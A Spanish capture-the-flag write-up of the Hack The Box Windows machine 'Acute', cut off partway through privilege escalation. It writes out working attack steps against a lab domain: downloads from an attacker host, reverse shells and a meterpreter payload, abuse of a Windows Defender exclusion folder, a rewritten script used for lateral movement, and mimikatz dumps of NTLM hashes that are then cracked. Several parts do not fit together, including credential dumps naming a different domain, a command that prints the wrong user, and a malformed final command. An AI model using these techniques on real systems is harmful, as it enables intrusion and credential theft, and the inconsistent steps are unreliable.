Acute
19 minutos de lectura
- SO: Windows
- Dificultad: Difícil
- Dirección IP: 10.10.11.145
- Fecha: 12 / 02 / 2022
Escaneo de puertos
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.11.145 -p 443
Nmap scan report for 10.10.11.145
Host is up (0.072s latency).
PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after: 2030-01-04T06:34:58
|_ssl-date: 2022-02-12T19:04:45+00:00; -17s from scanner time.
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -17s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 26.62 seconds
La máquina tiene abierto el puerto 443 (HTTPS).
Enumeración
Si vamos a https://10.10.11.145, no veremos nada:
Podemos encontrar un subdominio llamado atsserver.acute.local en la salida de nmap. Ahora podemos añadirlo a /etc/hosts y también acute.local por si acaso. Y vemos una página web al ir a https://atsserver.acute.local:
Existe una sección de “about” donde podmeos descargar un documento de Microsoft Word (.docx), pinchando en la esquina superior derecha en un botón llamado “New Starter Forms”:
El archivo de Word contiene algunas instrucciones para los empleados que se unen a la empresa. La información más interesante es esta:
The University’s staff induction pages can be found at:
https://atsserver.acute.local/Staff
The Staff Induction portal can be found here:
https://atsserver.acute.local/Staff/Induction
Arrange for the new starter to receive a demonstration on using IT tools which may include MUSE, myJob and Google accounts. Walk the new starter through the password change policy, they will need to change it from the default Password1!. Not all staff are changing these so please be sure to run through this
Run through the new PSWA to highlight the restrictions set on the sessions named dc_manage
Complete the remote (
https://atsserver.acute.local/acute_staff_access) training
Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin
Hemos encontrado tres nuevas URL, aunque solo una funciona:
Genial, esto es un portal de acceso a un ordenador por PowerShell (PWSA), pero necesitamos credenciales y un nombre de ordenador al que conectarnos.
Enumeración de usuarios
Como en muchar máquinas Windows, los nombres de usuarios son importantes para la explotación.
El documento de Word muestra un usuario llamado Lois y una contraseña potencial: Password1!.
Mirando a los metadatos utilizando exiftool vemos más cosas:
$ exiftool New_Starter_CheckList_v7.docx
ExifTool Version Number : 12.30
File Name : New_Starter_CheckList_v7.docx
...
Zip Compressed Size : 428
Zip Uncompressed Size : 2527
Zip File Name : [Content_Types].xml
Creator : FCastle
Description : Created on Acute-PC01
Last Modified By : Daniel
Revision Number : 8
Last Printed : 2021:01:04 15:54:00Z
Create Date : 2021:12:08 14:21:00Z
Modify Date : 2021:12:22 00:39:00Z
Template : Normal.dotm
Total Edit Time : 2.6 hours
Pages : 3
Words : 886
Characters : 5055
Application : Microsoft Office Word
Doc Security : None
Lines : 42
Paragraphs : 11
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company : University of Marvel
Links Up To Date : No
Characters With Spaces : 5930
Shared Doc : No
Hyperlinks Changed : No
App Version : 16.0000
Tenemos dos nombres de usuario (FCastle y Daniel) y un nombre de ordenador (Acute-PC01).
Ahora podemos utilizar este nombre de ordenador, la contraseña u los nombres de usuarios para entrar a PSWA, pero no funcionan.
De hecho, podemos encontrar más usuarios en la sección de “about” de la página web:
Como hay un nombre de usuario llamado FCastle, podemos deducir que los nombres de usuario se obtienen con la primera letra del nombre seguida del apellido.
Por tanto, tenemos estos nombres de usuarios por el momento:
Lois(LHopkins)DanielFCastleAWallaceCHallEDaviesIMonksJMorgan
Acceso a la máquina
Ahora podemos realizar un ataque de password spray para intentar conectarnos a Acute-PC01 desde PSWA. La conexión es exitosa para EDavies:Password1!:
Analizando Acute-PC01
Podemos realizar un reconocimiento básico del sistema:
PS C:\Users\edavies\Documents>
dir C:\
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 07/12/2019 9:14 PerfLogs
d-r--- 06/12/2021 11:06 Program Files
d-r--- 07/12/2021 12:43 Program Files (x86)
d-r--- 21/12/2021 22:50 Users
d----- 21/12/2021 22:53 Utils
d----- 16/12/2021 1:23 Windows
PS C:\Users\edavies\Documents>
dir C:\Users
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 21/12/2021 13:01 administrator.ACUTE
d----- 22/12/2021 1:26 edavies
d----- 21/12/2021 22:50 jmorgan
d----- 19/11/2021 9:29 Natasha
d-r--- 18/11/2020 23:43 Public
PS C:\Users\edavies\Documents>
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::9513:4361:23ec:64fd%14
IPv4 Address. . . . . . . . . . . : 172.16.22.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.22.1
PS C:\Users\edavies\Documents>
Vemos que no estamos en la máquina que debemos comprometer porque la dirección IP es 172.16.22.2 y queremos que sea 10.10.11.145.
Vamos a enumerar un poco más:
PS C:\Users\edavies\Documents>
cd C:\Users
PS C:\Users>
tree
Folder PATH listing
Volume serial number is 8A9A-E124
C:.
ÃÄÄÄadministrator.ACUTE
ÃÄÄÄedavies
³ ÃÄÄÄ3D Objects
³ ÃÄÄÄContacts
³ ÃÄÄÄDesktop
³ ÃÄÄÄDocuments
³ ÃÄÄÄDownloads
³ ÃÄÄÄFavorites
³ ÃÄÄÄLinks
³ ÃÄÄÄMusic
³ ³ ÀÄÄÄPlaylists
³ ÃÄÄÄOneDrive
³ ÃÄÄÄPictures
³ ³ ÀÄÄÄCamera Roll
³ ÃÄÄÄSaved Games
³ ÃÄÄÄSearches
³ ÀÄÄÄVideos
³ ÀÄÄÄCaptures
ÃÄÄÄjmorgan
ÃÄÄÄNatasha
ÀÄÄÄPublic
No hay nada interesante en las carpetas personales de los usuarios. ¿Tenemos algun privilegio útil o pertenecemos a algún grupo?
PS C:\Users>
whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
acute\edavies S-1-5-21-1786406921-1914792807-2072761762-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Enumeración del controlador de dominio
No parece. El gateway de salida de Acute-PC01 por defecto es la máquina principal:
PS C:Users\>
nslookup atsserver.acute.local
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 172.16.22.1
Name: atsserver.acute.local
Addresses: dead:beef::283e:7912:47ab:5601
dead:beef::1f9
172.16.22.1
10.10.11.145
PS C:Users\>
nslookup acute.local
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 172.16.22.1
Name: acute.local
Addresses: dead:beef::1f9
dead:beef::283e:7912:47ab:5601
172.16.22.1
10.10.11.145
Vamos a realizar un escaneo de puertos de esta máquina:
PS C:\Users>
53,88,135,389,445,1443,5985 | % {echo ((New-Object Net.Sockets.TcpClient).Connect('172.16.22.1', $_)) "Port $_ : open"} 2>$null
Port 53 : open
Port 88 : open
Port 135 : open
Port 389 : open
Port 445 : open
Port 5985 : open
Parece un controlador de dominio de un entorno de Active Directory porque tiene abiertos los puertos 53 (DNS), 88 (Kerberos), 135 (MS-RPC), 389 (LDAP) y 445 (SMB).
Para atacar al controlador de dominio, tendremos que utilizar Acute-PC01 como pivote. Utilizaré chisel como proxy SOCKS5 para poder lanzar las herramientas ofensivas de AD desde la máquina de atacante. Podemos compilarlo para Windows o descargar el binario compilado de la sección de descargas.
Primero de todo, vamos a conseguir una reverse shell para tener algo más de control. Utilizaré ConPtyShell. Si tratamos de subirlo a C:\Windows\Temp mediante un servidor HTTP con Python, Windows Defender lo bloquea:
PS C:\Users>
cd C:\Windows\Temp
PS C:\Windows\Temp>
curl http://10.10.17.44/ConPtyShell.exe -o r.exe
PS C:\Windows\Temp>
.\r.exe
Program 'r.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted software.
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
Podemos consultar las carpetas que no son examinadas mediante esta consulta:
PS C:\Windows\Temp>
reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
C:\Utils REG_DWORD 0x0
C:\Windows\System32 REG_DWORD 0x0
Como se ve, C:\Utils no se valida. Vamos a descargar el binario aquí entonces:
PS C:\Windows\Temp>
cd C:\Utils
PS C:\Utils>
curl http://10.10.17.44/ConPtyShell.exe -o r.exe
Ahora, desde la máquina de atacante, iniciamos nc y ejecutamos el binario desde Acute-PC01:
PS C:\Utils>
.\r.exe 10.10.17.44 4444 50 158
CreatePseudoConsole function found! Spawning a fully interactive shell
Y recibimos la conexión:
$ nc -nlvp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.145.
Ncat: Connection from 10.10.11.145:49865.
^Z
zsh: suspended ncat -nlvp 4444
$ stty raw -echo; fg
[1] + continued ncat -nlvp 4444
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Utils>
Capturas de pantalla de una sesión de escritorio remoto
En este punto, podemos ejecutar winpeas.exe para enumerar un poco más:
PS C:\Utils> curl http://10.10.17.44/winPEASx64.exe -o w.exe
Existe una sesión de RDP en proceso:
╔══════════╣ RDP Sessions
SessID pSessionName pUserName pDomainName State SourceIP
1 Console edavies ACUTE Active
Podemos obtener esta misma información con este comando:
PS C:\Utils> query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
edavies console 1 Active none 17/02/2022 20:06
Ahora nos trataremos de conectar a esta sesión mediante rdesktop desde la máquina de atacante. Para ello, tenemos que utilizar chisel y hacer que Acute-PC01 sea un pivote (proxy SOCKS5).
$ ./chisel server --port 1234 --reverse --socks5
server: Reverse tunnelling enabled
server: Fingerprint 5poOpBwlXtp1WxVRCm7EbKeboWO2ERpbS+LdvV4V6CY=
server: Listening on http://0.0.0.0:1234
PS C:\Utils> curl http://10.10.17.44/chisel.exe -o c.exe
PS C:\Utils> .\c.exe client 10.10.17.44:1234 R:socks
client: Connecting to ws://10.10.17.44:1234
client: Connected (Latency 36.4951ms)
Y la conexión se establece correctamente:
$ ./chisel server --port 1234 --reverse --socks5
server: Reverse tunnelling enabled
server: Fingerprint 5poOpBwlXtp1WxVRCm7EbKeboWO2ERpbS+LdvV4V6CY=
server: Listening on http://0.0.0.0:1234
server: session#1: Client version (0.0.0-src) differs from server version (1.7.7)
server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
Vamos a verificar que llegamos a la máquina víctima:
# proxychains4 -q nmap -sT -sV -p 445,3389 172.16.22.1
Starting Nmap 7.92 ( https://nmap.org )
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 172.16.22.1
Host is up (13s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
3389/tcp closed ms-wbt-server
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.25 seconds
Vemos que el puerto RDP está cerrado. A lo mejor la sesión sigue activa, por lo que podríamos hacer una captura de pantalla y visualizar dicha sesión. Para ello, tenemos que utilizar Metasploit.
Primero, creamos un binario con la consola de meterpreter:
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.17.44 LPORT=4444 -f exe -o m.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Final size of exe file: 206848 bytes
Saved as: m.exe
Iniciamos un handler con msfconsole:
# msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST 10.10.17.44
LHOST => 10.10.17.44
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.17.44:4444
Luego, subimos el binario y lo ejecutamos:
PS C:\Utils> curl http://10.10.17.44/m.exe -o m.exe
PS C:\Utils> .\m.exe
Y recibimos la conexión:
# msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST 10.10.17.44
LHOST => 10.10.17.44
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.17.44:4444
[*] Meterpreter session 1 opened (10.10.17.44:4444 -> 10.10.11.145:49842)
meterpreter > getuid
Server username: ACUTE\edavies
meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: ./xjWtVNMB.html
[*] Streaming...
Con estos comandos, veremos las capturas de pantalla en tiempo real:
Y encontramos que el usuario está tratando de ejecutar los siguientes comandos:
Enter-PSSession -computername atsserver
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlaintext -Force
$cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $pass)
Enter-PSSession -computername ATSSERVER -credential $cred
Enter-PSSession -computername ATSSERVER -ConfigurationName dc_manage -credential $cred
Movimiento lateral al usuario imonks
Ahora podemos continuar desde la primera reverse shell en lugar de seguir con meterpreter y utilizar los comandos anteriores para conectarnos a la máquina víctima utilizando script blocks:
PS C:\Utils> $pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlaintext -Force
PS C:\Utils> $cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $pass)
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
acute\imonks
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls C:\Users\imonks\Desktop }
Directory: C:\Users\imonks\Desktop
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 18/02/2022 10:38 34 user.txt atsserver
-a---- 11/01/2022 18:04 602 wm.ps1 atsserver
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { type C:\Users\imonks\Desktop\user.txt }
8df8cbb2405a467ccc13d7af36b0d611
En este punto, hemos conseguido la flag user.txt.
Vamos a verificar qué usuarios están configurados en esta máquina:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net user }
User accounts for \\
-------------------------------------------------------------------------------
Administrator awallace chall
edavies Guest imonks
jmorgan krbtgt lhopkins
The command completed with one or more errors.
El usuario imonks pertenece al grupo Managers:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net user imonks /domain }
User name imonks
Full Name Ieuan Monks
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 21/12/2021 14:51:31
Password expires Never
Password changeable 22/12/2021 14:51:31
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 18/02/2022 11:04:17
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Managers
The command completed successfully.
Si consultamos más usuarios que pertenecen a Managers vemos que awallace también es miembro:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { net groups Managers }
Group name Managers
Comment
Members
-------------------------------------------------------------------------------
awallace imonks
The command completed successfully.
Existe un directorio inusual en C:\Program Files, pero no tenemos permisos para acceder a él:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls "C:\Program Files" }
Directory: C:\Program Files
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d----- 21/12/2021 00:04 common files atsserver
d----- 21/12/2021 00:11 Hyper-V atsserver
d----- 15/09/2018 08:12 internet explorer atsserver
d----- 18/02/2022 12:54 keepmeon atsserver
d----- 21/12/2021 00:04 VMware atsserver
d----- 20/12/2021 21:19 Windows Defender atsserver
d----- 20/12/2021 21:12 Windows Defender Advanced Threat Protection atsserver
d----- 21/12/2021 14:13 WindowsPowerShell atsserver
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls "C:\Program Files\keepmeon" }
Access to the path 'C:\Program Files\keepmeon' is denied.
+ CategoryInfo : PermissionDenied: (C:\Program Files\keepmeon:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
+ PSComputerName : atsserver
Movimiento lateral al usuario jmorgan
En la carpeta Desktop de imonks hay un script en PowerShell:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { type C:\Users\imonks\Desktop\wm.ps1 }
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
Está realizando acciones en Acute-PC01 como jmorgan. Somos capaces de modificar este script en PowerShell para conseguir una reverse shell como jmorgan:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ((cat 'C:\Users\imonks\Desktop\wm.ps1' -Raw) -Replace 'Get-Volume', ' C:\Utils\r.exe 10.10.17.44 5555 50 158 ') | Set-Content -Path C:\Users\imonks\Desktop\wm.ps1 }
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { type C:\Users\imonks\Desktop\wm.ps1 }
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock { C:\Utils\r.exe 10.10.17.44 5555 50 158 } -ComputerName Acute-PC01 -Credential $creds
Y ahora está modificado. Si lo ejecutamos, obtenemos la reverse shell como jmorgan en Acute-PC01:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { C:\Users\imonks\Desktop\wm.ps1 }
CreatePseudoConsole function found! Spawning a fully interactive shell
$ nc -nlvp 5555
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.11.145.
Ncat: Connection from 10.10.11.145:49872.
^Z
zsh: suspended ncat -nlvp 5555
$ stty raw -echo; fg
[1] + continued ncat -nlvp 5555
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\jmorgan\Documents>> whoami
acute\jmorgan
Extracción de hashes NTLM
Descubrimos que jmorgan pertenece a Administrators:
PS C:\Users\jmorgan\Documents>> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Por tanto, podemos volcar los hashes NTLM del SAM utilizando mimikatz.exe:
PS C:\Users\jmorgan\Documents> cd C:\Utils
PS C:\Users\jmorgan\Documents> curl http://10.10.17.44/mimikatz.exe -o mm.exe
PS C:\Utils> .\mm.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz #
Ahora tenemos que introducir privilege::debug, token::elevate, lsadump::sam:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
632 {0;000003e7} 0 D 23650 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Primary
-> Impersonated !
* Process Token : {0;00168d80} 0 D 1503149 ACUTE\jmorgan S-1-5-21-1786406921-1914792807-2072761762-1108 (09g,24p) Primary
* Thread Token : {0;000003e7} 0 D 1818149 NT AUTHORITY\SYSTEM S-1-5-18 (04g,31p) Impersonation (Delegation)
mimikatz # lsadump::sam
Domain : ACUTE-PC01
SysKey : 44397c32a634e3d8d8f64bff8c614af7
Local SID : S-1-5-21-2560123600-3246320471-2688489995
SAMKey : fb8ee3299f8af5fb2100621a50059fa2
RID : 000001f4 (500)
User : Administrator
Hash NTLM: a29f7623fd11550def0192de9246f46b
lm - 0: c8ff11012182f1dc95a478b25fdde0da
ntlm- 0: a29f7623fd11550def0192de9246f46b
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 7699e833f3fc55323a6c2d9582bb143f
* Primary:Kerberos-Newer-Keys *
Default Salt : MVL-SVR01.MARVEL.HTBAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : c3cd5b6f980fdebc434e04eed27ef73b7e257fda197e008bc7ef1b3502a075a5
aes128_hmac (4096) : 83cb77df0959373fb1f7dbdda42ad684
des_cbc_md5 (4096) : 8f3249ef3dc1bff7
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : MVL-SVR01.MARVEL.HTBAdministrator
Credentials
des_cbc_md5 : 8f3249ef3dc1bff7
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 24571eab88ac0e2dcef127b8e9ad4740
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 014e3c3563b7599b4b2ffea6a1f5ce60
* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 8f08a53f14bbb27f0283fd90323dcd4e21ccc7a119d60cbbafb6c461ded08710
aes128_hmac (4096) : 11e388be492e65daac6493f665631d3f
des_cbc_md5 (4096) : 297ad0071abf5b6d
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WDAGUtilityAccount
Credentials
des_cbc_md5 : 297ad0071abf5b6d
RID : 000003e9 (1001)
User : Natasha
Hash NTLM: 29ab86c5c4d2aab957763e5c1720486d
lm - 0: f82f2bf1f89c2939790e40f751d5b190
ntlm- 0: 29ab86c5c4d2aab957763e5c1720486d
ntlm- 1: de3638aef735f9b81ea181465871e71b
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : fdd887d7c6e85189b2cbc37ac772b429
* Primary:Kerberos-Newer-Keys *
Default Salt : MVL-SVR01.MARVEL.HTBNatasha
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 85ef7e3d1d28efc32cec29b4d2e201fc0eb55b05c5e3249f951aba713fe8fe67
aes128_hmac (4096) : 70893ba6dd932940051a0714a3a7b184
des_cbc_md5 (4096) : 978a07d05ba770f7
OldCredentials
aes256_hmac (4096) : 6d8e87f273e0260d402c65f1b6c3da5604dacf6d25a543a65827acdf927fd924
aes128_hmac (4096) : dedc1d09097b091f2e430a2c8d768107
des_cbc_md5 (4096) : 1089e6eca449c731
OlderCredentials
aes256_hmac (4096) : 6d8e87f273e0260d402c65f1b6c3da5604dacf6d25a543a65827acdf927fd924
aes128_hmac (4096) : dedc1d09097b091f2e430a2c8d768107
des_cbc_md5 (4096) : 1089e6eca449c731
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : MVL-SVR01.MARVEL.HTBNatasha
Credentials
des_cbc_md5 : 978a07d05ba770f7
OldCredentials
des_cbc_md5 : 1089e6eca449c731
De la salida anterior, conseguimos los siguientes hashes NTLM:
Administrator:a29f7623fd11550def0192de9246f46bNatasha:29ab86c5c4d2aab957763e5c1720486dWDAGUtilityAccount:24571eab88ac0e2dcef127b8e9ad4740
En lugar de utilizar Pass the Hash, los trataremos de romper con john:
$ echo 'Administrator:a29f7623fd11550def0192de9246f46b' >> hashes
$ echo 'Natasha:29ab86c5c4d2aab957763e5c1720486d' >> hashes
$ echo 'WDAGUtilityAccount:24571eab88ac0e2dcef127b8e9ad4740' >> hashes
$ john --wordlist=$WORDLISTS/rockyou.txt --format=NT hashes
Using default input encoding: UTF-8
Loaded 3 password hashes with no different salts (NT [MD4 128/128 ASIMD 4x2])
Press 'q' or Ctrl-C to abort, almost any other key for status
Password@123 (Administrator)
1g 0:00:00:00 DONE 1.098g/s 15762Kp/s 15762Kc/s 32676KC/s "amo-te"..*7¡Vamos!
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
Movimiento lateral al usuario awallace
Ahora podemos acceder como awallace utilizando el mismo procedimiento que antes:
PS C:\Utils> $pass = ConvertTo-SecureString "Password@123" -AsPlaintext -Force
PS C:\Utils> $cred = New-Object System.Management.Automation.PSCredential ("acute\awallace", $pass)
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
acute\imonks
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
acute\awallace
Este usuario es capaz de listar la carpeta C:\Program Files\keepmeon, donde encontramos un script Batch:
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { ls "C:\Program Files\keepmeon" }
Directory: C:\Program Files\keepmeon
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-a---- 21/12/2021 14:57 128 keepmeon.bat atsserver
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { type "C:\Program Files\keepmeon\keepmeon.bat" }
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)
El script se ejecuta cada 5 minutos y básicamente ejecuta cualquier script Batch que hay en la carpeta actual.
Escalada de privilegios
Aquí tenemos que recordar que Lois (lhopkins) es capaz de asignar los miembros de los grupos (mostrado en el documento de Word). Por tanto, podemos utilizar un comando para añadir a awallace al grupo Site_Admin:
PS C:\Utils> Invoke-Command -ConfigurationName dc_manage -Credential $cred -ScriptBlock { Set-Content -Path net user lhopkins }
User name lhopkins
Full Name Lois Hopkins
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 21/12/2021 14:51:53
Password expires Never
Password changeable 22/12/2021 14:51:53
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 27/02/2022 01:31:45
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
PS C:\Utils> Invoke-Command atsserver -ConfigurationName dc_manage -Credential $cred -ScriptBlock { Set-Content -Path "C:\Program Files\keepmeon\a.bat" -Value net group site_admin }
